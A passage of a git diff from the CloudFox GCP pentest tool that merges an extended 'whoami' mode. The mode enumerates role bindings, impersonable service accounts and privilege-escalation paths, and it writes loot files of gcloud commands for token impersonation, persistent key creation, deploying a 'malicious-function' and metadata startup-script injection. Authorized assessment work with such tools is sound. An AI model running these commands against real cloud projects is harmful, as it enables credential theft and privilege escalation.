persistent keys", - Description: "Can create service account keys for any SA", - Risk: "CRITICAL", - Command: fmt.Sprintf("gcloud iam service-accounts list --project=%s", projectID), - }) - case "roles/cloudfunctions.admin": - paths = append(paths, PrivilegeEscalationPath{ - Name: "Cloud Functions Admin - Code Execution", - Description: "Can deploy Cloud Functions with SA permissions", - Risk: "HIGH", - Command: "gcloud functions deploy malicious-function --runtime=python39 --trigger-http --service-account=", - }) - case "roles/compute.admin": - paths = append(paths, PrivilegeEscalationPath{ - Name: "Compute Admin - Metadata Injection", - Description: "Can add startup scripts with SA access", - Risk: "HIGH", - Command: "gcloud compute instances add-metadata --metadata=startup-script='curl -H \"Metadata-Flavor: Google\" http://metadata/...'", - }) - case "roles/container.admin": - paths = append(paths, PrivilegeEscalationPath{ - Name: "Container Admin - Pod Deployment", - Description: "Can deploy pods with service account access", - Risk: "HIGH", - Command: fmt.Sprintf("gcloud container clusters get-credentials --project=%s", projectID), - }) - case "roles/owner", "roles/editor": - paths = append(paths, PrivilegeEscalationPath{ - Name: "Owner/Editor - Full Project Access", - Description: "Has full control over project resources", - Risk: "CRITICAL", - Command: fmt.Sprintf("gcloud projects get-iam-policy %s", projectID), - }) - } - - return paths -} - -// ------------------------------ -// Loot File Management -// ------------------------------ -func (m *WhoAmIEnhancedModule) initializeLootFiles() { - m.LootMap["whoami-context"] = &internal.LootFile{ - Name: "whoami-context", - Contents: "# GCP Identity Context\n# Generated by CloudFox\n\n", - } - m.LootMap["whoami-permissions"] = &internal.LootFile{ - Name: "whoami-permissions", - Contents: "# Current Identity Permissions\n# Generated by CloudFox\n\n", - } - m.LootMap["whoami-impersonation"] = &internal.LootFile{ - Name: "whoami-impersonation", - Contents: "# Service Account Impersonation Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization!\n\n", - } - m.LootMap["whoami-privesc"] = &internal.LootFile{ - Name: "whoami-privesc", - Contents: "# Privilege Escalation Paths\n# Generated by CloudFox\n# WARNING: Only use with proper authorization!\n\n", - } -} - -func (m *WhoAmIEnhancedModule) generateLoot() { - // Context loot - m.LootMap["whoami-context"].Contents += fmt.Sprintf( - "Identity: %s\n"+ - "Type: %s\n"+ - "Projects: %s\n"+ - "Organizations: %d\n"+ - "Folders: %d\n\n", - m.Identity.Email, - m.Identity.Type, - strings.Join(m.Identity.ProjectIDs, ", "), - len(m.Identity.Organizations), - len(m.Identity.Folders), - ) - - // Permissions loot - for _, rb := range m.RoleBindings { - m.LootMap["whoami-permissions"].Contents += fmt.Sprintf( - "%s on %s/%s\n", - rb.Role, - rb.Scope, - rb.ScopeID, - ) - } - - // Impersonation loot - for _, target := range m.ImpersonationTargets { - m.LootMap["whoami-impersonation"].Contents += fmt.Sprintf( - "# Service Account: %s\n"+ - "# Project: %s\n", - target.ServiceAccount, - target.ProjectID, - ) - if target.CanImpersonate { - m.LootMap["whoami-impersonation"].Contents += fmt.Sprintf( - "gcloud auth print-access-token --impersonate-service-account=%s\n", - target.ServiceAccount, - ) - } - if target.CanCreateKeys { - m.LootMap["whoami-impersonation"].Contents += fmt.Sprintf( - "gcloud iam service-accounts keys create key.json --iam-account=%s\n", - target.ServiceAccount, - ) - } - m.LootMap["whoami-impersonation"].Contents += "\n" - } - - // Privilege escalation loot - for _, path := range m.PrivEscPaths { - m.LootMap["whoami-privesc"].Contents += fmt.Sprintf( - "## %s [%s]\n"+ - "# %s\n"+ - "%s\n\n", - path.Name, - path.Risk, - path.Description, - path.Command, - ) - } -} - -// ------------------------------ -// Output Generation -// ------------------------------ -func (m *WhoAmIEnhancedModule) writeOutput(ctx context.Context, logger internal.Logger) { - // Identity table - identityHeader := []string{ - "Property", - "Value", - } - - identityBody := [][]string{ - {"Email", m.Identity.Email}, - {"Type", m.Identity.Type}, - {"Projects", strings.Join(m.Identity.ProjectIDs, ", ")}, - {"Organizations", fmt.Sprintf("%d", len(m.Identity.Organizations))}, - {"Folders", fmt.Sprintf("%d", len(m.Identity.Folders))}, - {"Role Bindings", fmt.Sprintf("%d", len(m.RoleBindings))}, - {"Impersonation Targets", fmt.Sprintf("%d", len(m.ImpersonationTargets))}, - {"Privilege Escalation Paths", fmt.Sprintf("%d", len(m.PrivEscPaths))}, - } - - // Role bindings table - rolesHeader := []string{ - "Role", - "Scope", - "Scope ID", - } - - var rolesBody [][]string - for _, rb := range m.RoleBindings { - rolesBody = append(rolesBody, []string{ - rb.Role, - rb.Scope, - rb.ScopeID, - }) - } - - // Impersonation targets table - impersonationHeader := []string{ - "Service Account", - "Project", - "Can Impersonate", - "Can Create Keys", - "Can ActAs", - } - - var impersonationBody [][]string - for _, target := range m.ImpersonationTargets { - impersonationBody = append(impersonationBody, []string{ - target.ServiceAccount, - target.ProjectID, - whoamiBoolToYesNo(target.CanImpersonate), - whoamiBoolToYesNo(target.CanCreateKeys), - whoamiBoolToYesNo(target.CanActAs), - }) - } - - // Privilege escalation table - privescHeader := []string{ - "Path Name", - "Risk", - "Description", - "Command", - } - - var privescBody [][]string - for _, path := range m.PrivEscPaths { - privescBody = append(privescBody, []string{ - path.Name, - path.Risk, - path.Description, - truncateString(path.Command, 50), - }) - } - - // Collect loot files - var lootFiles []internal.LootFile - for _, loot := range m.LootMap { - if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { - lootFiles = append(lootFiles, *loot) - } - } - - // Build tables - tables := []internal.TableFile{ - { - Name: "whoami-identity", - Header: identityHeader, - Body: identityBody, - }, - } - - if len(rolesBody) > 0 { - tables = append(tables, internal.TableFile{ - Name: "whoami-roles", - Header: rolesHeader, - Body: rolesBody, - }) - } - - if len(impersonationBody) > 0 { - tables = append(tables, internal.TableFile{ - Name: "whoami-impersonation", - Header: impersonationHeader, - Body: impersonationBody, - }) - } - - if len(privescBody) > 0 { - tables = append(tables, internal.TableFile{ - Name: "whoami-privesc", - Header: privescHeader, - Body: privescBody, - }) - } - - output := WhoAmIEnhancedOutput{ - Table: tables, - Loot: lootFiles, - } - - // Write output - err := internal.HandleOutputSmart( - "gcp", - m.Format, - m.OutputDirectory, - m.Verbosity, - m.WrapTable, - "project", - m.ProjectIDs, - m.ProjectIDs, - m.Account, - output, - ) - if err != nil { - logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), GCP_WHOAMI_ENHANCED_MODULE_NAME) - m.CommandCounter.Error++ - } -} - -// whoamiBoolToYesNo converts a boolean to "Yes" or "No" -func whoamiBoolToYesNo(b bool) string { - if b { - return "Yes" - } - return "No" -} diff --git a/gcp/commands/whoami.go b/gcp/commands/whoami.go index c686b7ba..e3ec2c6f 100644 --- a/gcp/commands/whoami.go +++ b/gcp/commands/whoami.go @@ -1,34 +1,747 @@ package commands import ( + "context" "fmt" + "strings" + "sync" + IAMService "github.com/BishopFox/cloudfox/gcp/services/iamService" OAuthService "github.com/BishopFox/cloudfox/gcp/services/oauthService" "github.com/BishopFox/cloudfox/globals" - "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" "github.com/spf13/cobra" + + cloudresourcemanager "google.golang.org/api/cloudresourcemanager/v1" ) +// Flag for extended enumeration +var whoamiExtended bool + var GCPWhoAmICommand = &cobra.Command{ - Use: globals.GCP_WHOAMI_MODULE_NAME, - Short: "Display the email address of the GCP authenticated user", - Args: cobra.NoArgs, - Run: runGCPWhoAmICommand, + Use: globals.GCP_WHOAMI_MODULE_NAME, + Aliases: []string{"identity", "me"}, + Short: "Display identity context for the authenticated GCP user/service account", + Long: `Display identity context for the authenticated GCP user/service account. + +Default output: +- Current identity details (email, type) +- Organization and folder context +- Effective role bindings across projects + +With --extended flag (adds): +- Service accounts that can be impersonated +- Privilege escalation opportunities +- Exploitation commands`, + Run: runGCPWhoAmICommand, +} + +func init() { + GCPWhoAmICommand.Flags().BoolVarP(&whoamiExtended, "extended", "e", false, "Enable extended enumeration (impersonation targets, privilege escalation paths)") +} + +// ------------------------------ +// Data Structures +// ------------------------------ + +type IdentityContext struct { + Email string + Type string // "user" or "serviceAccount" + UniqueID string + ProjectIDs []string + Organizations []OrgInfo + Folders []FolderInfo } +type OrgInfo struct { + Name string + DisplayName string + OrgID string +} + +type FolderInfo struct { + Name string + DisplayName string + Parent string +} + +type RoleBinding struct { + Role string + Scope string // "organization", "folder", "project" + ScopeID string + Inherited bool + Condition string +} + +type ImpersonationTarget struct { + ServiceAccount string + ProjectID string + CanImpersonate bool + CanCreateKeys bool + CanActAs bool +} + +type PrivilegeEscalationPath struct { + Name string + Description string + Risk string // CRITICAL, HIGH, MEDIUM + Command string +} + +// ------------------------------ +// Module Struct +// ------------------------------ +type WhoAmIModule struct { + gcpinternal.BaseGCPModule + + Identity IdentityContext + RoleBindings []RoleBinding + ImpersonationTargets []ImpersonationTarget + PrivEscPaths []PrivilegeEscalationPath + DangerousPermissions []string + LootMap map[string]*internal.LootFile + Extended bool + mu sync.Mutex +} + +// ------------------------------ +// Output Struct +// ------------------------------ +type WhoAmIOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o WhoAmIOutput) TableFiles() []internal.TableFile { return o.Table } +func (o WhoAmIOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ func runGCPWhoAmICommand(cmd *cobra.Command, args []string) { - logger := internal.NewLogger() + // Initialize command context + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_WHOAMI_MODULE_NAME) + if err != nil { + return + } - // Initialize the OAuthService - oauthService := OAuthService.NewOAuthService() + // Create module instance + module := &WhoAmIModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + RoleBindings: []RoleBinding{}, + ImpersonationTargets: []ImpersonationTarget{}, + PrivEscPaths: []PrivilegeEscalationPath{}, + DangerousPermissions: []string{}, + LootMap: make(map[string]*internal.LootFile), + Extended: whoamiExtended, + } - // Call the WhoAmI function + // Initialize loot files + module.initializeLootFiles() + + // Execute enumeration + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *WhoAmIModule) Execute(ctx context.Context, logger internal.Logger) { + if m.Extended { + logger.InfoM("Gathering comprehensive identity context (extended mode)...", globals.GCP_WHOAMI_MODULE_NAME) + } else { + logger.InfoM("Gathering identity context...", globals.GCP_WHOAMI_MODULE_NAME) + } + + // Step 1: Get current identity + oauthService := OAuthService.NewOAuthService() principal, err := oauthService.WhoAmI() if err != nil { logger.ErrorM(fmt.Sprintf("Error retrieving token info: %v", err), globals.GCP_WHOAMI_MODULE_NAME) return } - logger.InfoM(fmt.Sprintf("authenticated user email: %s", principal.Email), globals.GCP_WHOAMI_MODULE_NAME) + m.Identity = IdentityContext{ + Email: principal.Email, + ProjectIDs: m.ProjectIDs, + } + + // Determine identity type + if strings.HasSuffix(principal.Email, ".gserviceaccount.com") { + m.Identity.Type = "serviceAccount" + } else { + m.Identity.Type = "user" + } + + logger.InfoM(fmt.Sprintf("Authenticated as: %s (%s)", m.Identity.Email, m.Identity.Type), globals.GCP_WHOAMI_MODULE_NAME) + + // Step 2: Get organization context (always run) + m.getOrganizationContext(ctx, logger) + + // Step 3: Get role bindings across projects (always run) + m.getRoleBindings(ctx, logger) + + // Extended mode: Additional enumeration + if m.Extended { + // Step 4: Find impersonation targets + m.findImpersonationTargets(ctx, logger) + + // Step 5: Identify privilege escalation paths + m.identifyPrivEscPaths(ctx, logger) + } + + // Step 6: Generate loot + m.generateLoot() + + // Write output + m.writeOutput(ctx, logger) +} + +// getOrganizationContext retrieves organization and folder hierarchy +func (m *WhoAmIModule) getOrganizationContext(ctx context.Context, logger internal.Logger) { + // Create resource manager client + crmService, err := cloudresourcemanager.NewService(ctx) + if err != nil { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.ErrorM(fmt.Sprintf("Error creating CRM client: %v", err), globals.GCP_WHOAMI_MODULE_NAME) + } + return + } + + // Get project ancestry for each project + for _, projectID := range m.ProjectIDs { + resp, err := crmService.Projects.GetAncestry(projectID, &cloudresourcemanager.GetAncestryRequest{}).Do() + if err != nil { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.ErrorM(fmt.Sprintf("Error getting ancestry for project %s: %v", projectID, err), globals.GCP_WHOAMI_MODULE_NAME) + } + continue + } + + for _, ancestor := range resp.Ancestor { + switch ancestor.ResourceId.Type { + case "organization": + orgInfo := OrgInfo{ + OrgID: ancestor.ResourceId.Id, + Name: fmt.Sprintf("organizations/%s", ancestor.ResourceId.Id), + } + // Check if already added + exists := false + for _, o := range m.Identity.Organizations { + if o.OrgID == orgInfo.OrgID { + exists = true + break + } + } + if !exists { + m.Identity.Organizations = append(m.Identity.Organizations, orgInfo) + } + case "folder": + folderInfo := FolderInfo{ + Name: fmt.Sprintf("folders/%s", ancestor.ResourceId.Id), + } + // Check if already added + exists := false + for _, f := range m.Identity.Folders { + if f.Name == folderInfo.Name { + exists = true + break + } + } + if !exists { + m.Identity.Folders = append(m.Identity.Folders, folderInfo) + } + } + } + } + + if len(m.Identity.Organizations) > 0 { + logger.InfoM(fmt.Sprintf("Found %d organization(s), %d folder(s)", len(m.Identity.Organizations), len(m.Identity.Folders)), globals.GCP_WHOAMI_MODULE_NAME) + } +} + +// getRoleBindings retrieves IAM role bindings for the current identity +func (m *WhoAmIModule) getRoleBindings(ctx context.Context, logger internal.Logger) { + iamService := IAMService.New() + + // Determine the member format for current identity + var memberPrefix string + if m.Identity.Type == "serviceAccount" { + memberPrefix = "serviceAccount:" + } else { + memberPrefix = "user:" + } + fullMember := memberPrefix + m.Identity.Email + + // Get role bindings from each project + for _, projectID := range m.ProjectIDs { + // Use PrincipalsWithRolesEnhanced which includes inheritance + principals, err := iamService.PrincipalsWithRolesEnhanced(projectID) + if err != nil { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.ErrorM(fmt.Sprintf("Error getting IAM bindings for project %s: %v", projectID, err), globals.GCP_WHOAMI_MODULE_NAME) + } + continue + } + + // Find bindings for the current identity + for _, principal := range principals { + if principal.Name == fullMember || principal.Email == m.Identity.Email { + for _, binding := range principal.PolicyBindings { + rb := RoleBinding{ + Role: binding.Role, + Scope: binding.ResourceType, + ScopeID: binding.ResourceID, + Inherited: binding.IsInherited, + } + if binding.HasCondition && binding.ConditionInfo != nil { + rb.Condition = binding.ConditionInfo.Title + } + + // Check for dangerous permissions + if isDangerousRole(binding.Role) { + m.DangerousPermissions = append(m.DangerousPermissions, fmt.Sprintf("%s on %s", binding.Role, binding.ResourceID)) + } + + m.mu.Lock() + m.RoleBindings = append(m.RoleBindings, rb) + m.mu.Unlock() + } + } + } + } + + logger.InfoM(fmt.Sprintf("Found %d role binding(s) for current identity", len(m.RoleBindings)), globals.GCP_WHOAMI_MODULE_NAME) +} + +// findImpersonationTargets identifies service accounts that can be impersonated +func (m *WhoAmIModule) findImpersonationTargets(ctx context.Context, logger internal.Logger) { + iamService := IAMService.New() + + // Determine the member format for current identity + var memberPrefix string + if m.Identity.Type == "serviceAccount" { + memberPrefix = "serviceAccount:" + } else { + memberPrefix = "user:" + } + fullMember := memberPrefix + m.Identity.Email + + for _, projectID := range m.ProjectIDs { + // Get all service accounts in the project + serviceAccounts, err := iamService.ServiceAccounts(projectID) + if err != nil { + continue + } + + for _, sa := range serviceAccounts { + // Check if current identity can impersonate this SA using GetServiceAccountIAMPolicy + impersonationInfo, err := iamService.GetServiceAccountIAMPolicy(ctx, sa.Email, projectID) + if err != nil { + continue + } + + // Check if current identity is in the token creators or key creators list + canImpersonate := false + canCreateKeys := false + canActAs := false + + for _, tc := range impersonationInfo.TokenCreators { + if tc == fullMember || tc == m.Identity.Email || tc == "allUsers" || tc == "allAuthenticatedUsers" { + canImpersonate = true + break + } + } + + for _, kc := range impersonationInfo.KeyCreators { + if kc == fullMember || kc == m.Identity.Email || kc == "allUsers" || kc == "allAuthenticatedUsers" { + canCreateKeys = true + break + } + } + + for _, aa := range impersonationInfo.ActAsUsers { + if aa == fullMember || aa == m.Identity.Email || aa == "allUsers" || aa == "allAuthenticatedUsers" { + canActAs = true + break + } + } + + if canImpersonate || canCreateKeys || canActAs { + target := ImpersonationTarget{ + ServiceAccount: sa.Email, + ProjectID: projectID, + CanImpersonate: canImpersonate, + CanCreateKeys: canCreateKeys, + CanActAs: canActAs, + } + m.ImpersonationTargets = append(m.ImpersonationTargets, target) + } + } + } + + if len(m.ImpersonationTargets) > 0 { + logger.InfoM(fmt.Sprintf("[PENTEST] Found %d service account(s) that can be impersonated", len(m.ImpersonationTargets)), globals.GCP_WHOAMI_MODULE_NAME) + } +} + +// identifyPrivEscPaths identifies privilege escalation paths based on current permissions +func (m *WhoAmIModule) identifyPrivEscPaths(ctx context.Context, logger internal.Logger) { + // Check for privilege escalation opportunities based on role bindings + for _, rb := range m.RoleBindings { + paths := getPrivEscPathsForRole(rb.Role, rb.ScopeID) + m.PrivEscPaths = append(m.PrivEscPaths, paths...) + } + + // Check impersonation-based privilege escalation + for _, target := range m.ImpersonationTargets { + if target.CanImpersonate { + path := PrivilegeEscalationPath{ + Name: fmt.Sprintf("Impersonate %s", target.ServiceAccount), + Description: "Can generate access tokens for this service account", + Risk: "HIGH", + Command: fmt.Sprintf("gcloud auth print-access-token --impersonate-service-account=%s", target.ServiceAccount), + } + m.PrivEscPaths = append(m.PrivEscPaths, path) + } + + if target.CanCreateKeys { + path := PrivilegeEscalationPath{ + Name: fmt.Sprintf("Create key for %s", target.ServiceAccount), + Description: "Can create persistent service account keys", + Risk: "CRITICAL", + Command: fmt.Sprintf("gcloud iam service-accounts keys create key.json --iam-account=%s", target.ServiceAccount), + } + m.PrivEscPaths = append(m.PrivEscPaths, path) + } + } + + if len(m.PrivEscPaths) > 0 { + logger.InfoM(fmt.Sprintf("[PRIVESC] Found %d privilege escalation path(s)", len(m.PrivEscPaths)), globals.GCP_WHOAMI_MODULE_NAME) + } +} + +// isDangerousRole checks if a role is considered dangerous +func isDangerousRole(role string) bool { + dangerousRoles := []string{ + "roles/owner", + "roles/editor", + "roles/iam.securityAdmin", + "roles/iam.serviceAccountAdmin", + "roles/iam.serviceAccountKeyAdmin", + "roles/iam.serviceAccountTokenCreator", + "roles/resourcemanager.organizationAdmin", + "roles/resourcemanager.folderAdmin", + "roles/resourcemanager.projectIamAdmin", + "roles/cloudfunctions.admin", + "roles/compute.admin", + "roles/container.admin", + "roles/storage.admin", + } + + for _, dr := range dangerousRoles { + if role == dr { + return true + } + } + return false +} + +// getPrivEscPathsForRole returns privilege escalation paths for a given role +func getPrivEscPathsForRole(role, projectID string) []PrivilegeEscalationPath { + var paths []PrivilegeEscalationPath + + switch role { + case "roles/iam.serviceAccountTokenCreator": + paths = append(paths, PrivilegeEscalationPath{ + Name: "Token Creator - Impersonate any SA", + Description: "Can generate access tokens for any service account in the project", + Risk: "CRITICAL", + Command: fmt.Sprintf("gcloud iam service-accounts list --project=%s", projectID), + }) + case "roles/iam.serviceAccountKeyAdmin": + paths = append(paths, PrivilegeEscalationPath{ + Name: "Key Admin - Create persistent keys", + Description: "Can create service account keys for any SA", + Risk: "CRITICAL", + Command: fmt.Sprintf("gcloud iam service-accounts list --project=%s", projectID), + }) + case "roles/cloudfunctions.admin": + paths = append(paths, PrivilegeEscalationPath{ + Name: "Cloud Functions Admin - Code Execution", + Description: "Can deploy Cloud Functions with SA permissions", + Risk: "HIGH", + Command: "gcloud functions deploy malicious-function --runtime=python39 --trigger-http --service-account=", + }) + case "roles/compute.admin": + paths = append(paths, PrivilegeEscalationPath{ + Name: "Compute Admin - Metadata Injection", + Description: "Can add startup scripts with SA access", + Risk: "HIGH", + Command: "gcloud compute instances add-metadata --metadata=startup-script='curl -H \"Metadata-Flavor: Google\" http://metadata/...'", + }) + case "roles/container.admin": + paths = append(paths, PrivilegeEscalationPath{ + Name: "Container Admin - Pod Deployment", + Description: "Can deploy pods with service account access", + Risk: "HIGH", + Command: fmt.Sprintf("gcloud container clusters get-credentials --project=%s", projectID), + }) + case "roles/owner", "roles/editor": + paths = append(paths, PrivilegeEscalationPath{ + Name: "Owner/Editor - Full Project Access", + Description: "Has full control over project resources", + Risk: "CRITICAL", + Command: fmt.Sprintf("gcloud projects get-iam-policy %s", projectID), + }) + } + + return paths +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *WhoAmIModule) initializeLootFiles() { + m.LootMap["whoami-context"] = &internal.LootFile{ + Name: "whoami-context", + Contents: "# GCP Identity Context\n# Generated by CloudFox\n\n", + } + m.LootMap["whoami-permissions"] = &internal.LootFile{ + Name: "whoami-permissions", + Contents: "# Current Identity Permissions\n# Generated by CloudFox\n\n", + } + + // Extended mode loot files + if m.Extended { + m.LootMap["whoami-impersonation"] = &internal.LootFile{ + Name: "whoami-impersonation", + Contents: "# Service Account Impersonation Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization!\n\n", + } + m.LootMap["whoami-privesc"] = &internal.LootFile{ + Name: "whoami-privesc", + Contents: "# Privilege Escalation Paths\n# Generated by CloudFox\n# WARNING: Only use with proper authorization!\n\n", + } + } +} + +func (m *WhoAmIModule) generateLoot() { + // Context loot + m.LootMap["whoami-context"].Contents += fmt.Sprintf( + "Identity: %s\n"+ + "Type: %s\n"+ + "Projects: %s\n"+ + "Organizations: %d\n"+ + "Folders: %d\n\n", + m.Identity.Email, + m.Identity.Type, + strings.Join(m.Identity.ProjectIDs, ", "), + len(m.Identity.Organizations), + len(m.Identity.Folders), + ) + + // Permissions loot + for _, rb := range m.RoleBindings { + m.LootMap["whoami-permissions"].Contents += fmt.Sprintf( + "%s on %s/%s\n", + rb.Role, + rb.Scope, + rb.ScopeID, + ) + } + + // Extended mode loot + if m.Extended { + // Impersonation loot + for _, target := range m.ImpersonationTargets { + m.LootMap["whoami-impersonation"].Contents += fmt.Sprintf( + "# Service Account: %s\n"+ + "# Project: %s\n", + target.ServiceAccount, + target.ProjectID, + ) + if target.CanImpersonate { + m.LootMap["whoami-impersonation"].Contents += fmt.Sprintf( + "gcloud auth print-access-token --impersonate-service-account=%s\n", + target.ServiceAccount, + ) + } + if target.CanCreateKeys { + m.LootMap["whoami-impersonation"].Contents += fmt.Sprintf( + "gcloud iam service-accounts keys create key.json --iam-account=%s\n", + target.ServiceAccount, + ) + } + m.LootMap["whoami-impersonation"].Contents += "\n" + } + + // Privilege escalation loot + for _, path := range m.PrivEscPaths { + m.LootMap["whoami-privesc"].Contents += fmt.Sprintf( + "## %s [%s]\n"+ + "# %s\n"+ + "%s\n\n", + path.Name, + path.Risk, + path.Description, + path.Command, + ) + } + } +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *WhoAmIModule) writeOutput(ctx context.Context, logger internal.Logger) { + // Identity table + identityHeader := []string{ + "Property", + "Value", + } + + identityBody := [][]string{ + {"Email", m.Identity.Email}, + {"Type", m.Identity.Type}, + {"Projects", strings.Join(m.Identity.ProjectIDs, ", ")}, + {"Organizations", fmt.Sprintf("%d", len(m.Identity.Organizations))}, + {"Folders", fmt.Sprintf("%d", len(m.Identity.Folders))}, + {"Role Bindings", fmt.Sprintf("%d", len(m.RoleBindings))}, + } + + // Add extended info to identity table + if m.Extended { + identityBody = append(identityBody, []string{"Impersonation Targets", fmt.Sprintf("%d", len(m.ImpersonationTargets))}) + identityBody = append(identityBody, []string{"Privilege Escalation Paths", fmt.Sprintf("%d", len(m.PrivEscPaths))}) + } + + // Role bindings table + rolesHeader := []string{ + "Role", + "Scope", + "Scope ID", + } + + var rolesBody [][]string + for _, rb := range m.RoleBindings { + rolesBody = append(rolesBody, []string{ + rb.Role, + rb.Scope, + rb.ScopeID, + }) + } + + // Build tables + tables := []internal.TableFile{ + { + Name: "whoami-identity", + Header: identityHeader, + Body: identityBody, + }, + } + + if len(rolesBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "whoami-roles", + Header: rolesHeader, + Body: rolesBody, + }) + } + + // Extended mode tables + if m.Extended { + // Impersonation targets table + if len(m.ImpersonationTargets) > 0 { + impersonationHeader := []string{ + "Service Account", + "Project", + "Can Impersonate", + "Can Create Keys", + "Can ActAs", + } + + var impersonationBody [][]string + for _, target := range m.ImpersonationTargets { + impersonationBody = append(impersonationBody, []string{ + target.ServiceAccount, + target.ProjectID, + whoamiBoolToYesNo(target.CanImpersonate), + whoamiBoolToYesNo(target.CanCreateKeys), + whoamiBoolToYesNo(target.CanActAs), + }) + } + + tables = append(tables, internal.TableFile{ + Name: "whoami-impersonation", + Header: impersonationHeader, + Body: impersonationBody, + }) + } + + // Privilege escalation table + if len(m.PrivEscPaths) > 0 { + privescHeader := []string{ + "Path Name", + "Risk", + "Description", + "Command", + } + + var privescBody [][]string + for _, path := range m.PrivEscPaths { + privescBody = append(privescBody, []string{ + path.Name, + path.Risk, + path.Description, + truncateString(path.Command, 50), + }) + } + + tables = append(tables, internal.TableFile{ + Name: "whoami-privesc", + Header: privescHeader, + Body: privescBody, + }) + } + } + + // Collect loot files + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + output := WhoAmIOutput{ + Table: tables, + Loot: lootFiles, + } + + // Write output + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + m.ProjectIDs, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_WHOAMI_MODULE_NAME) + m.CommandCounter.Error++ + } +} + +// whoamiBoolToYesNo converts a boolean to "Yes" or "No" +func whoamiBoolToYesNo(b bool) string { + if b { + return "Yes" + } + return "No" } diff --git a/gcp/commands/workloadidentity.go b/gcp/commands/workloadidentity.go index 7e1393fd..d58815be 100644 --- a/gcp/commands/workloadidentity.go +++ b/gcp/commands/workloadidentity.go @@ -625,6 +625,7 @@ func (m *WorkloadIdentityModule) writeOutput(ctx context.Context, logger interna clustersHeader := []string{ "Cluster", "Location", + "Project Name", "Project", "WI Enabled", "Workload Pool", @@ -645,6 +646,7 @@ func (m *WorkloadIdentityModule) writeOutput(ctx context.Context, logger interna clustersBody = append(clustersBody, []string{ cwi.ClusterName, cwi.Location, + m.GetProjectName(cwi.ProjectID), cwi.ProjectID, wiEnabled, workloadPool, @@ -659,6 +661,7 @@ func (m *WorkloadIdentityModule) writeOutput(ctx context.Context, logger interna "GCP Service Account", "High Privilege", "Cluster", + "Project Name", "Project", } @@ -675,6 +678,7 @@ func (m *WorkloadIdentityModule) writeOutput(ctx context.Context, logger interna binding.GCPServiceAccount, highPriv, binding.ClusterName, + m.GetProjectName(binding.ProjectID), binding.ProjectID, }) } @@ -743,6 +747,7 @@ func (m *WorkloadIdentityModule) writeOutput(ctx context.Context, logger interna if len(m.Pools) > 0 { poolsHeader := []string{ "Pool ID", + "Project Name", "Project", "Display Name", "State", @@ -757,6 +762,7 @@ func (m *WorkloadIdentityModule) writeOutput(ctx context.Context, logger interna } poolsBody = append(poolsBody, []string{ pool.PoolID, + m.GetProjectName(pool.ProjectID), pool.ProjectID, pool.DisplayName, pool.State, @@ -780,6 +786,7 @@ func (m *WorkloadIdentityModule) writeOutput(ctx context.Context, logger interna "Type", "Issuer/Account", "Attribute Condition", + "Project Name", "Project", } @@ -809,6 +816,7 @@ func (m *WorkloadIdentityModule) writeOutput(ctx context.Context, logger interna p.ProviderType, issuerOrAccount, attrCond, + m.GetProjectName(p.ProjectID), p.ProjectID, }) } @@ -827,6 +835,7 @@ func (m *WorkloadIdentityModule) writeOutput(ctx context.Context, logger interna "Pool", "GCP Service Account", "External Subject", + "Project Name", "Project", } @@ -842,6 +851,7 @@ func (m *WorkloadIdentityModule) writeOutput(ctx context.Context, logger interna fb.PoolID, fb.GCPServiceAccount, externalSubject, + m.GetProjectName(fb.ProjectID), fb.ProjectID, }) } @@ -859,6 +869,10 @@ func (m *WorkloadIdentityModule) writeOutput(ctx context.Context, logger interna } // Write output using HandleOutputSmart with scope support + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } err := internal.HandleOutputSmart( "gcp", m.Format, @@ -867,7 +881,7 @@ func (m *WorkloadIdentityModule) writeOutput(ctx context.Context, logger interna m.WrapTable, "project", // scopeType m.ProjectIDs, // scopeIdentifiers - m.ProjectIDs, // scopeNames (same as IDs for GCP projects) + scopeNames, // scopeNames m.Account, output, ) diff --git a/globals/gcp.go b/globals/gcp.go index 07c85d0e..3311c10b 100644 --- a/globals/gcp.go +++ b/globals/gcp.go @@ -63,7 +63,6 @@ const GCP_CERTMANAGER_MODULE_NAME string = "cert-manager" // New security analysis modules (Azure equivalents) const GCP_SECURITYCENTER_MODULE_NAME string = "security-center" -const GCP_WHOAMI_ENHANCED_MODULE_NAME string = "whoami-full" const GCP_LATERALMOVEMENT_MODULE_NAME string = "lateral-movement" const GCP_NETWORKEXPOSURE_MODULE_NAME string = "network-exposure" const GCP_DATAEXFILTRATION_MODULE_NAME string = "data-exfiltration" diff --git a/internal/gcp/base.go b/internal/gcp/base.go index 6386e15a..9cc695bc 100644 --- a/internal/gcp/base.go +++ b/internal/gcp/base.go @@ -20,8 +20,9 @@ type CommandContext struct { Logger internal.Logger // Project information - ProjectIDs []string - Account string // Authenticated account email + ProjectIDs []string + ProjectNames map[string]string // ProjectID -> DisplayName mapping + Account string // Authenticated account email // Configuration flags Verbosity int @@ -48,8 +49,9 @@ type CommandContext struct { // } type BaseGCPModule struct { // Project and identity - ProjectIDs []string - Account string // Authenticated account email + ProjectIDs []string + 